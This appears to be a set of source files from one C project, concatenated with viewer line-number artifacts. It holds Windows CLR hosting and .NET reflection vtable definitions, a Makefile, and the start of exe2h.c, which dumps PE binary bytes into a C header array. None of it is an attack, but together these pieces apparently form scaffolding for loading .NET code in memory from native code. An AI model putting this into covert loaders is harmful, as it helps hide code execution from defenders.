    DUMMY_METHOD(ReflectedType);
    DUMMY_METHOD(GetCustomAttributes);
    DUMMY_METHOD(GetCustomAttributes_2);
    DUMMY_METHOD(IsDefined);
    DUMMY_METHOD(Guid);
    DUMMY_METHOD(Module);
    DUMMY_METHOD(Assembly);
    DUMMY_METHOD(TypeHandle);
    DUMMY_METHOD(FullName);
    DUMMY_METHOD(Namespace);
    DUMMY_METHOD(AssemblyQualifiedName);
    DUMMY_METHOD(GetArrayRank);
    DUMMY_METHOD(BaseType);
    DUMMY_METHOD(GetConstructors);
    DUMMY_METHOD(GetInterface);
    DUMMY_METHOD(GetInterfaces);
    DUMMY_METHOD(FindInterfaces);
    DUMMY_METHOD(GetEvent);
    DUMMY_METHOD(GetEvents);
    DUMMY_METHOD(GetEvents_2);
    DUMMY_METHOD(GetNestedTypes);
    DUMMY_METHOD(GetNestedType);
    DUMMY_METHOD(GetMember);
    DUMMY_METHOD(GetDefaultMembers);
    DUMMY_METHOD(FindMembers);
    DUMMY_METHOD(GetElementType);
    DUMMY_METHOD(IsSubclassOf);
    DUMMY_METHOD(IsInstanceOfType);
    DUMMY_METHOD(IsAssignableFrom);
    DUMMY_METHOD(GetInterfaceMap);
    DUMMY_METHOD(GetMethod);
    DUMMY_METHOD(GetMethod_2);
    DUMMY_METHOD(GetMethods);
    DUMMY_METHOD(GetField);
    DUMMY_METHOD(GetFields);
    DUMMY_METHOD(GetProperty);
    DUMMY_METHOD(GetProperty_2);
    DUMMY_METHOD(GetProperties);
    DUMMY_METHOD(GetMember_2);
    DUMMY_METHOD(GetMembers);
    DUMMY_METHOD(InvokeMember);
    DUMMY_METHOD(UnderlyingSystemType);
    DUMMY_METHOD(InvokeMember_2);

    // InvokeMember(name, invokeAttr, binder, target, args) overload.
    // invokeAttr is a BindingFlags mask; Target is passed as a VARIANT by
    // value; args is a SAFEARRAY of VARIANTs; *pRetVal receives the result.
    // NOTE: the parameter named `Binder` shadows the `Binder` typedef declared
    // earlier in this header — legal in prototype scope, but easy to misread.
    HRESULT (STDMETHODCALLTYPE *InvokeMember_3)(
        IType *This,
        BSTR name,
        BindingFlags invokeAttr,
        IBinder *Binder,
        VARIANT Target,
        SAFEARRAY *args,
        VARIANT *pRetVal);

    DUMMY_METHOD(GetConstructor);
    DUMMY_METHOD(GetConstructor_2);
    DUMMY_METHOD(GetConstructor_3);
    DUMMY_METHOD(GetConstructors_2);
    DUMMY_METHOD(TypeInitializer);
    DUMMY_METHOD(GetMethod_3);
    DUMMY_METHOD(GetMethod_4);
    DUMMY_METHOD(GetMethod_5);
    DUMMY_METHOD(GetMethod_6);
    DUMMY_METHOD(GetMethods_2);
    DUMMY_METHOD(GetField_2);
    DUMMY_METHOD(GetFields_2);
    DUMMY_METHOD(GetInterface_2);
    DUMMY_METHOD(GetEvent_2);
    DUMMY_METHOD(GetProperty_3);
    DUMMY_METHOD(GetProperty_4);
    DUMMY_METHOD(GetProperty_5);
    DUMMY_METHOD(GetProperty_6);
    DUMMY_METHOD(GetProperty_7);
    DUMMY_METHOD(GetProperties_2);
    DUMMY_METHOD(GetNestedTypes_2);
    DUMMY_METHOD(GetNestedType_2);
    DUMMY_METHOD(GetMember_3);
    DUMMY_METHOD(GetMembers_2);
    DUMMY_METHOD(Attributes);
    DUMMY_METHOD(IsNotPublic);
    DUMMY_METHOD(IsPublic);
    DUMMY_METHOD(IsNestedPublic);
    DUMMY_METHOD(IsNestedPrivate);
    DUMMY_METHOD(IsNestedFamily);
    DUMMY_METHOD(IsNestedAssembly);
    DUMMY_METHOD(IsNestedFamANDAssem);
    DUMMY_METHOD(IsNestedFamORAssem);
    DUMMY_METHOD(IsAutoLayout);
    DUMMY_METHOD(IsLayoutSequential);
    DUMMY_METHOD(IsExplicitLayout);
    DUMMY_METHOD(IsClass);
    DUMMY_METHOD(IsInterface);
    DUMMY_METHOD(IsValueType);
    DUMMY_METHOD(IsAbstract);
    DUMMY_METHOD(IsSealed);
    DUMMY_METHOD(IsEnum);
    DUMMY_METHOD(IsSpecialName);
    DUMMY_METHOD(IsImport);
    DUMMY_METHOD(IsSerializable);
    DUMMY_METHOD(IsAnsiClass);
    DUMMY_METHOD(IsUnicodeClass);
    DUMMY_METHOD(IsAutoClass);
    DUMMY_METHOD(IsArray);
    DUMMY_METHOD(IsByRef);
    DUMMY_METHOD(IsPointer);
    DUMMY_METHOD(IsPrimitive);
    DUMMY_METHOD(IsCOMObject);
    DUMMY_METHOD(HasElementType);
    DUMMY_METHOD(IsContextful);
    DUMMY_METHOD(IsMarshalByRef);
    DUMMY_METHOD(Equals_2);

    END_INTERFACE
} TypeVtbl;
449 | ||
// Vtable for ICLRRuntimeInfo (CLR hosting API, metahost.h): describes one
// installed runtime version and hands out its hosting interfaces. The
// buffer-returning methods follow the "size in, size out" convention:
// *pcchBuffer is the capacity on entry and the required length on return.
// As with every vtable in this header, slot order must match the real
// interface exactly.
typedef struct ICLRRuntimeInfoVtbl
{
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        ICLRRuntimeInfo * This,
        /* [in] */ REFIID riid,
        /* [iid_is][out] */
        __RPC__deref_out void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        ICLRRuntimeInfo * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        ICLRRuntimeInfo * This);

    HRESULT ( STDMETHODCALLTYPE *GetVersionString )(
        ICLRRuntimeInfo * This,
        /* [size_is][out] */
        __out_ecount_full_opt(*pcchBuffer) LPWSTR pwzBuffer,
        /* [out][in] */ DWORD *pcchBuffer);

    HRESULT ( STDMETHODCALLTYPE *GetRuntimeDirectory )(
        ICLRRuntimeInfo * This,
        /* [size_is][out] */
        __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
        /* [out][in] */ DWORD *pcchBuffer);

    HRESULT ( STDMETHODCALLTYPE *IsLoaded )(
        ICLRRuntimeInfo * This,
        /* [in] */ HANDLE hndProcess,
        /* [retval][out] */ BOOL *pbLoaded);

    HRESULT ( STDMETHODCALLTYPE *LoadErrorString )(
        ICLRRuntimeInfo * This,
        /* [in] */ UINT iResourceID,
        /* [size_is][out] */
        __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
        /* [out][in] */ DWORD *pcchBuffer,
        /* [lcid][in] */ LONG iLocaleID);

    HRESULT ( STDMETHODCALLTYPE *LoadLibrary )(
        ICLRRuntimeInfo * This,
        /* [in] */ LPCWSTR pwzDllName,
        /* [retval][out] */ HMODULE *phndModule);

    HRESULT ( STDMETHODCALLTYPE *GetProcAddress )(
        ICLRRuntimeInfo * This,
        /* [in] */ LPCSTR pszProcName,
        /* [retval][out] */ LPVOID *ppProc);

    // Obtain a hosting interface (e.g. ICorRuntimeHost) for this runtime.
    HRESULT ( STDMETHODCALLTYPE *GetInterface )(
        ICLRRuntimeInfo * This,
        /* [in] */ REFCLSID rclsid,
        /* [in] */ REFIID riid,
        /* [retval][iid_is][out] */ LPVOID *ppUnk);

    HRESULT ( STDMETHODCALLTYPE *IsLoadable )(
        ICLRRuntimeInfo * This,
        /* [retval][out] */ BOOL *pbLoadable);

    HRESULT ( STDMETHODCALLTYPE *SetDefaultStartupFlags )(
        ICLRRuntimeInfo * This,
        /* [in] */ DWORD dwStartupFlags,
        /* [in] */ LPCWSTR pwzHostConfigFile);

    HRESULT ( STDMETHODCALLTYPE *GetDefaultStartupFlags )(
        ICLRRuntimeInfo * This,
        /* [out] */ DWORD *pdwStartupFlags,
        /* [size_is][out] */
        __out_ecount_full_opt(*pcchHostConfigFile) LPWSTR pwzHostConfigFile,
        /* [out][in] */ DWORD *pcchHostConfigFile);

    HRESULT ( STDMETHODCALLTYPE *BindAsLegacyV2Runtime )(
        ICLRRuntimeInfo * This);

    HRESULT ( STDMETHODCALLTYPE *IsStarted )(
        ICLRRuntimeInfo * This,
        /* [out] */ BOOL *pbStarted,
        /* [out] */ DWORD *pdwStartupFlags);

    END_INTERFACE
} ICLRRuntimeInfoVtbl;
533 | ||
// COM object layout: a single pointer to ICLRRuntimeInfoVtbl.
typedef struct _ICLRRuntimeInfo {
    ICLRRuntimeInfoVtbl *lpVtbl;
} ICLRRuntimeInfo;
537 | ||
// COM object layout: a single pointer to TypeVtbl (defined above).
typedef struct _Type {
    TypeVtbl *lpVtbl;
} Type;
541 | ||
// Vtable for ICLRMetaHost (CLR hosting API, metahost.h): the entry point for
// discovering installed/loaded runtimes and obtaining an ICLRRuntimeInfo for
// a specific version string. Slot order must match the real interface.
typedef struct ICLRMetaHostVtbl
{
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        ICLRMetaHost * This,
        /* [in] */ REFIID riid,
        /* [iid_is][out] */
        __RPC__deref_out void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        ICLRMetaHost * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        ICLRMetaHost * This);

    // Look up a runtime by version string (e.g. "v4.0.30319") and return the
    // interface identified by riid for it.
    HRESULT ( STDMETHODCALLTYPE *GetRuntime )(
        ICLRMetaHost * This,
        /* [in] */ LPCWSTR pwzVersion,
        /* [in] */ REFIID riid,
        /* [retval][iid_is][out] */ LPVOID *ppRuntime);

    HRESULT ( STDMETHODCALLTYPE *GetVersionFromFile )(
        ICLRMetaHost * This,
        /* [in] */ LPCWSTR pwzFilePath,
        /* [size_is][out] */
        __out_ecount_full(*pcchBuffer) LPWSTR pwzBuffer,
        /* [out][in] */ DWORD *pcchBuffer);

    HRESULT ( STDMETHODCALLTYPE *EnumerateInstalledRuntimes )(
        ICLRMetaHost * This,
        /* [retval][out] */ IEnumUnknown **ppEnumerator);

    HRESULT ( STDMETHODCALLTYPE *EnumerateLoadedRuntimes )(
        ICLRMetaHost * This,
        /* [in] */ HANDLE hndProcess,
        /* [retval][out] */ IEnumUnknown **ppEnumerator);

    HRESULT ( STDMETHODCALLTYPE *RequestRuntimeLoadedNotification )(
        ICLRMetaHost * This,
        /* [in] */ RuntimeLoadedCallbackFnPtr pCallbackFunction);

    HRESULT ( STDMETHODCALLTYPE *QueryLegacyV2RuntimeBinding )(
        ICLRMetaHost * This,
        /* [in] */ REFIID riid,
        /* [retval][iid_is][out] */ LPVOID *ppUnk);

    HRESULT ( STDMETHODCALLTYPE *ExitProcess )(
        ICLRMetaHost * This,
        /* [in] */ INT32 iExitCode);

    END_INTERFACE
} ICLRMetaHostVtbl;
595 | ||
// COM object layout: a single pointer to ICLRMetaHostVtbl.
typedef struct _ICLRMetaHost
{
    ICLRMetaHostVtbl *lpVtbl;
} ICLRMetaHost;
600 | ||
// Vtable for ICorRuntimeHost (legacy CLR hosting interface, mscoree.h):
// starts/stops the runtime and creates or enumerates application domains.
// The domain-returning methods hand back IUnknown*, which the caller must
// QueryInterface to _AppDomain before use. Slot order must match the real
// interface exactly.
typedef struct ICorRuntimeHostVtbl
{
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        ICorRuntimeHost * This,
        /* [in] */ REFIID riid,
        /* [iid_is][out] */
        __RPC__deref_out void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        ICorRuntimeHost * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        ICorRuntimeHost * This);

    HRESULT ( STDMETHODCALLTYPE *CreateLogicalThreadState )(
        ICorRuntimeHost * This);

    HRESULT ( STDMETHODCALLTYPE *DeleteLogicalThreadState )(
        ICorRuntimeHost * This);

    HRESULT ( STDMETHODCALLTYPE *SwitchInLogicalThreadState )(
        ICorRuntimeHost * This,
        /* [in] */ DWORD *pFiberCookie);

    HRESULT ( STDMETHODCALLTYPE *SwitchOutLogicalThreadState )(
        ICorRuntimeHost * This,
        /* [out] */ DWORD **pFiberCookie);

    HRESULT ( STDMETHODCALLTYPE *LocksHeldByLogicalThread )(
        ICorRuntimeHost * This,
        /* [out] */ DWORD *pCount);

    HRESULT ( STDMETHODCALLTYPE *MapFile )(
        ICorRuntimeHost * This,
        /* [in] */ HANDLE hFile,
        /* [out] */ HMODULE *hMapAddress);

    HRESULT ( STDMETHODCALLTYPE *GetConfiguration )(
        ICorRuntimeHost * This,
        /* [out] */ ICorConfiguration **pConfiguration);

    // Start the runtime; must succeed before domains can be used.
    HRESULT ( STDMETHODCALLTYPE *Start )(
        ICorRuntimeHost * This);

    HRESULT ( STDMETHODCALLTYPE *Stop )(
        ICorRuntimeHost * This);

    HRESULT ( STDMETHODCALLTYPE *CreateDomain )(
        ICorRuntimeHost * This,
        /* [in] */ LPCWSTR pwzFriendlyName,
        /* [in] */ IUnknown *pIdentityArray,
        /* [out] */ IUnknown **pAppDomain);

    // Returns the process default domain as IUnknown*.
    HRESULT ( STDMETHODCALLTYPE *GetDefaultDomain )(
        ICorRuntimeHost * This,
        /* [out] */ IUnknown **pAppDomain);

    HRESULT ( STDMETHODCALLTYPE *EnumDomains )(
        ICorRuntimeHost * This,
        /* [out] */ HDOMAINENUM *hEnum);

    HRESULT ( STDMETHODCALLTYPE *NextDomain )(
        ICorRuntimeHost * This,
        /* [in] */ HDOMAINENUM hEnum,
        /* [out] */ IUnknown **pAppDomain);

    HRESULT ( STDMETHODCALLTYPE *CloseEnum )(
        ICorRuntimeHost * This,
        /* [in] */ HDOMAINENUM hEnum);

    HRESULT ( STDMETHODCALLTYPE *CreateDomainEx )(
        ICorRuntimeHost * This,
        /* [in] */ LPCWSTR pwzFriendlyName,
        /* [in] */ IUnknown *pSetup,
        /* [in] */ IUnknown *pEvidence,
        /* [out] */ IUnknown **pAppDomain);

    HRESULT ( STDMETHODCALLTYPE *CreateDomainSetup )(
        ICorRuntimeHost * This,
        /* [out] */ IUnknown **pAppDomainSetup);

    HRESULT ( STDMETHODCALLTYPE *CreateEvidence )(
        ICorRuntimeHost * This,
        /* [out] */ IUnknown **pEvidence);

    HRESULT ( STDMETHODCALLTYPE *UnloadDomain )(
        ICorRuntimeHost * This,
        /* [in] */ IUnknown *pAppDomain);

    HRESULT ( STDMETHODCALLTYPE *CurrentDomain )(
        ICorRuntimeHost * This,
        /* [out] */ IUnknown **pAppDomain);

    END_INTERFACE
} ICorRuntimeHostVtbl;
698 | ||
// COM object layout: a single pointer to ICorRuntimeHostVtbl.
typedef struct _ICorRuntimeHost {
    ICorRuntimeHostVtbl *lpVtbl;
} ICorRuntimeHost;
702 | ||
703 | #undef DUMMY_METHOD | |
704 | #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IMethodInfo *This) | |
705 | ||
// Vtable for the .NET _MethodInfo interface, reached through IMethodInfo::lpVtbl.
// Typed slots: the IUnknown triple, GetParameters (parameter list as a
// SAFEARRAY) and Invoke_3 (call the method). Everything else is a
// DUMMY_METHOD placeholder kept only for its offset. Slot order and count
// are load-bearing — do not reorder, insert or drop entries.
typedef struct _MethodInfoVtbl {
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        IMethodInfo *This,
        /* [in] */ REFIID riid,
        /* [iid_is][out] */
        __RPC__deref_out void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IMethodInfo *This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IMethodInfo *This);

    DUMMY_METHOD(GetTypeInfoCount);
    DUMMY_METHOD(GetTypeInfo);
    DUMMY_METHOD(GetIDsOfNames);
    DUMMY_METHOD(Invoke);

    DUMMY_METHOD(ToString);
    DUMMY_METHOD(Equals);
    DUMMY_METHOD(GetHashCode);
    DUMMY_METHOD(GetType);
    DUMMY_METHOD(MemberType);
    DUMMY_METHOD(name);
    DUMMY_METHOD(DeclaringType);
    DUMMY_METHOD(ReflectedType);
    DUMMY_METHOD(GetCustomAttributes);
    DUMMY_METHOD(GetCustomAttributes_2);
    DUMMY_METHOD(IsDefined);

    // *pRetVal receives the method's parameters as a SAFEARRAY.
    HRESULT ( STDMETHODCALLTYPE *GetParameters)(
        IMethodInfo *This,
        SAFEARRAY **pRetVal);

    DUMMY_METHOD(GetMethodImplementationFlags);
    DUMMY_METHOD(MethodHandle);
    DUMMY_METHOD(Attributes);
    DUMMY_METHOD(CallingConvention);
    DUMMY_METHOD(Invoke_2);
    DUMMY_METHOD(IsPublic);
    DUMMY_METHOD(IsPrivate);
    DUMMY_METHOD(IsFamily);
    DUMMY_METHOD(IsAssembly);
    DUMMY_METHOD(IsFamilyAndAssembly);
    DUMMY_METHOD(IsFamilyOrAssembly);
    DUMMY_METHOD(IsStatic);
    DUMMY_METHOD(IsFinal);
    DUMMY_METHOD(IsVirtual);
    DUMMY_METHOD(IsHideBySig);
    DUMMY_METHOD(IsAbstract);
    DUMMY_METHOD(IsSpecialName);
    DUMMY_METHOD(IsConstructor);

    // Invoke(obj, parameters): obj is the target instance as a VARIANT (by
    // value), parameters a SAFEARRAY of arguments; *ret receives the result.
    HRESULT ( STDMETHODCALLTYPE *Invoke_3 )(
        IMethodInfo *This,
        VARIANT obj,
        SAFEARRAY *parameters,
        VARIANT *ret);

    DUMMY_METHOD(returnType);
    DUMMY_METHOD(ReturnTypeCustomAttributes);
    DUMMY_METHOD(GetBaseDefinition);

    END_INTERFACE
} MethodInfoVtbl;
773 | ||
// COM object layout: a single pointer to MethodInfoVtbl.
typedef struct _MethodInfo {
    MethodInfoVtbl *lpVtbl;
} MethodInfo;
777 | ||
// Vtable for ICorConfiguration (CLR hosting API, mscoree.h): lets a host
// register GC and debugger thread-control callbacks. Obtained via
// ICorRuntimeHost::GetConfiguration. Slot order must match the real interface.
typedef struct ICorConfigurationVtbl
{
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        ICorConfiguration * This,
        /* [in] */ REFIID riid,
        /* [iid_is][out] */
        __RPC__deref_out void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        ICorConfiguration * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        ICorConfiguration * This);

    HRESULT ( STDMETHODCALLTYPE *SetGCThreadControl )(
        ICorConfiguration * This,
        /* [in] */ IGCThreadControl *pGCThreadControl);

    HRESULT ( STDMETHODCALLTYPE *SetGCHostControl )(
        ICorConfiguration * This,
        /* [in] */ IGCHostControl *pGCHostControl);

    HRESULT ( STDMETHODCALLTYPE *SetDebuggerThreadControl )(
        ICorConfiguration * This,
        /* [in] */ IDebuggerThreadControl *pDebuggerThreadControl);

    HRESULT ( STDMETHODCALLTYPE *AddDebuggerSpecialThread )(
        ICorConfiguration * This,
        /* [in] */ DWORD dwSpecialThreadId);

    END_INTERFACE
} ICorConfigurationVtbl;
812 | ||
// COM object layout: a single pointer to ICorConfigurationVtbl.
typedef struct _ICorConfiguration
{
    ICorConfigurationVtbl *lpVtbl;
}ICorConfiguration;
817 | ||
// Vtable for IGCThreadControl (CLR hosting API): host-implemented callbacks
// the runtime invokes around garbage-collection thread suspension.
// Slot order must match the real interface.
typedef struct IGCThreadControlVtbl
{
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        IGCThreadControl * This,
        /* [in] */ REFIID riid,
        /* [iid_is][out] */
        __RPC__deref_out void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IGCThreadControl * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IGCThreadControl * This);

    HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForSuspension )(
        IGCThreadControl * This);

    HRESULT ( STDMETHODCALLTYPE *SuspensionStarting )(
        IGCThreadControl * This);

    HRESULT ( STDMETHODCALLTYPE *SuspensionEnding )(
        IGCThreadControl * This,
        DWORD Generation);

    END_INTERFACE
} IGCThreadControlVtbl;
846 | ||
// COM object layout: a single pointer to IGCThreadControlVtbl.
typedef struct _IGCThreadControl
{
    IGCThreadControlVtbl *lpVtbl;
}IGCThreadControl;
851 | ||
// Vtable for IGCHostControl (CLR hosting API): a single host callback through
// which the GC asks for permission to grow its virtual-memory limit
// (sizes in megabytes, per the parameter names). Slot order must match the
// real interface.
typedef struct IGCHostControlVtbl
{
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        IGCHostControl * This,
        /* [in] */ REFIID riid,
        /* [iid_is][out] */
        __RPC__deref_out void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IGCHostControl * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IGCHostControl * This);

    HRESULT ( STDMETHODCALLTYPE *RequestVirtualMemLimit )(
        IGCHostControl * This,
        /* [in] */ SIZE_T sztMaxVirtualMemMB,
        /* [out][in] */ SIZE_T *psztNewMaxVirtualMemMB);

    END_INTERFACE
} IGCHostControlVtbl;
875 | ||
// COM object layout: a single pointer to IGCHostControlVtbl.
typedef struct _IGCHostControl
{
    IGCHostControlVtbl *lpVtbl;
} IGCHostControl;
880 | ||
// Vtable for IDebuggerThreadControl (CLR hosting API): host-implemented
// callbacks the runtime invokes when it blocks or releases threads for the
// managed debugger. Slot order must match the real interface.
typedef struct IDebuggerThreadControlVtbl
{
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        IDebuggerThreadControl * This,
        /* [in] */ REFIID riid,
        /* [iid_is][out] */
        __RPC__deref_out void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IDebuggerThreadControl * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IDebuggerThreadControl * This);

    HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForDebugger)(
        IDebuggerThreadControl * This);

    HRESULT ( STDMETHODCALLTYPE *ReleaseAllRuntimeThreads)(
        IDebuggerThreadControl * This);

    HRESULT ( STDMETHODCALLTYPE *StartBlockingForDebugger)(
        IDebuggerThreadControl * This,
        DWORD dwUnused);

    END_INTERFACE
} IDebuggerThreadControlVtbl;
909 | ||
// COM object layout: a single pointer to IDebuggerThreadControlVtbl.
typedef struct _IDebuggerThreadControl {
    IDebuggerThreadControlVtbl *lpVtbl;
} IDebuggerThreadControl;
913 | ||
914 | #endif | |
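# Cross-build the exe2h helper for Windows with mingw-w64.
# Neither target names a file it produces (the compiler writes exe2h.exe),
# so both are declared phony: a stray file called "exe2h" or "clean" must
# not silently suppress the rule.
.PHONY: exe2h clean

exe2h:
	x86_64-w64-mingw32-gcc exe2h.c mmap-windows.c -lshlwapi -oexe2h.exe

# -f keeps `make clean` from failing on a tree that has never been built.
clean:
	rm -f exe2h.exe *.o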
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #include <stdio.h> | |
32 | #include <string.h> | |
33 | #include <stdlib.h> | |
34 | #include <stdint.h> | |
35 | #include <ctype.h> | |
36 | ||
37 | #include <fcntl.h> | |
38 | #include <errno.h> | |
39 | #include <sys/types.h> | |
40 | #include <sys/stat.h> | |
41 | ||
42 | #if defined(_WIN32) || defined(_WIN64) | |
43 | #define WINDOWS | |
44 | #include <windows.h> | |
45 | #include <shlwapi.h> | |
46 | #include "mmap.h" | |
47 | #pragma comment(lib, "shlwapi.lib") | |
48 | #else | |
49 | #define NIX | |
50 | #include <libgen.h> | |
51 | #include <sys/mman.h> | |
52 | #include <unistd.h> | |
53 | #include <pe.h> | |
54 | #endif | |
55 | ||
56 | // return pointer to DOS header | |
57 | PIMAGE_DOS_HEADER DosHdr(void *map) { | |
58 | return (PIMAGE_DOS_HEADER)map; | |
59 | } | |
60 | ||
61 | // return pointer to NT header | |
62 | PIMAGE_NT_HEADERS NtHdr (void *map) { | |
63 | return (PIMAGE_NT_HEADERS) ((uint8_t*)map + DosHdr(map)->e_lfanew); | |
64 | } | |
65 | ||
66 | // return pointer to File header | |
67 | PIMAGE_FILE_HEADER FileHdr (void *map) { | |
68 | return &NtHdr(map)->FileHeader; | |
69 | } | |
70 | ||
71 | // determines CPU architecture of binary | |
72 | int is32 (void *map) { | |
73 | return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_I386; | |
74 | } | |
75 | ||
76 | // determines CPU architecture of binary | |
77 | int is64 (void *map) { | |
78 | return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_AMD64; | |
79 | } | |
80 | ||
81 | // return pointer to Optional header | |
82 | void* OptHdr (void *map) { | |
83 | return (void*)&NtHdr(map)->OptionalHeader; | |
84 | } | |
85 | ||
86 | // return pointer to first section header | |
87 | PIMAGE_SECTION_HEADER SecHdr (void *map) { | |
88 | PIMAGE_NT_HEADERS nt = NtHdr(map); | |
89 | ||
90 | return (PIMAGE_SECTION_HEADER)((uint8_t*)&nt->OptionalHeader + | |
91 | nt->FileHeader.SizeOfOptionalHeader); | |
92 | } | |
93 | ||
94 | uint32_t DirSize (void *map) { | |
95 | if (is32(map)) { | |
96 | return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->NumberOfRvaAndSizes; | |
97 | } else { | |
98 | return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->NumberOfRvaAndSizes; | |
99 | } | |
100 | } | |
101 | ||
102 | uint32_t SecSize (void *map) { | |
103 | return NtHdr(map)->FileHeader.NumberOfSections; | |
104 | } | |
105 | ||
106 | PIMAGE_DATA_DIRECTORY Dirs (void *map) { | |
107 | if (is32(map)) { | |
108 | return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->DataDirectory; | |
109 | } else { | |
110 | return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->DataDirectory; | |
111 | } | |
112 | } | |
113 | ||
114 | uint64_t ImgBase (void *map) { | |
115 | if (is32(map)) { | |
116 | return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->ImageBase; | |
117 | } else { | |
118 | return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->ImageBase; | |
119 | } | |
120 | } | |
121 | ||
122 | // valid dos header? | |
123 | int valid_dos_hdr (void *map) { | |
124 | PIMAGE_DOS_HEADER dos = DosHdr(map); | |
125 | ||
126 | if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0; | |
127 | return (dos->e_lfanew != 0); | |
128 | } | |
129 | ||
130 | // valid nt headers | |
131 | int valid_nt_hdr (void *map) { | |
132 | return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE; | |
133 | } | |
134 | ||
135 | uint32_t rva2ofs (void *map, uint32_t rva) { | |
136 | int i; | |
137 | ||
138 | PIMAGE_SECTION_HEADER sh = SecHdr(map); | |
139 | ||
140 | for (i=0; i<SecSize(map); i++) { | |
141 | if (rva >= sh[i].VirtualAddress && rva < sh[i].VirtualAddress + sh[i].SizeOfRawData) | |
142 | return sh[i].PointerToRawData + (rva - sh[i].VirtualAddress); | |
143 | } | |
144 | return -1; | |
145 | } | |
146 | ||
147 | void bin2h(void *map, char *fname, void *bin, uint32_t len) { | |
148 | char label[32], file[32], *str; | |
149 | uint32_t i; | |
150 | uint8_t *p=(uint8_t*)bin; | |
151 | FILE *fd; | |
152 | ||
153 | memset(label, 0, sizeof(label)); | |
154 | memset(file, 0, sizeof(file)); | |
155 | ||
156 | #if defined(WINDOWS) | |
157 | str = PathFindFileName(fname); | |
158 | #else | |
159 | str = basename(fname); | |
160 | #endif | |
161 | for(i=0; str[i] != 0 && i < 16;i++) { | |
162 | if(str[i] == '.') { | |
163 | file[i] = label[i] = '_'; | |
164 | } else { | |
165 | label[i] = toupper(str[i]); | |
166 | file[i] = tolower(str[i]); | |
167 | } | |
168 | } | |
169 | if(map != NULL) { | |
170 | strcat(label, is32(map) ? "_X86" : "_X64"); | |
171 | strcat(file, is32(map) ? "_x86" : "_x64"); | |
172 | } | |
173 | strcat(file, ".h"); | |
174 | ||
175 | fd = fopen(file, "wb"); | |
176 | ||
177 | if(fd != NULL) { | |
178 | fprintf(fd, "\nunsigned char %s[] = {", label); | |
179 | ||
180 | for(i=0;i<len;i++) { | |
181 | if(!(i % 12)) fprintf(fd, "\n "); | |
182 | fprintf(fd, "0x%02x", p[i]); | |
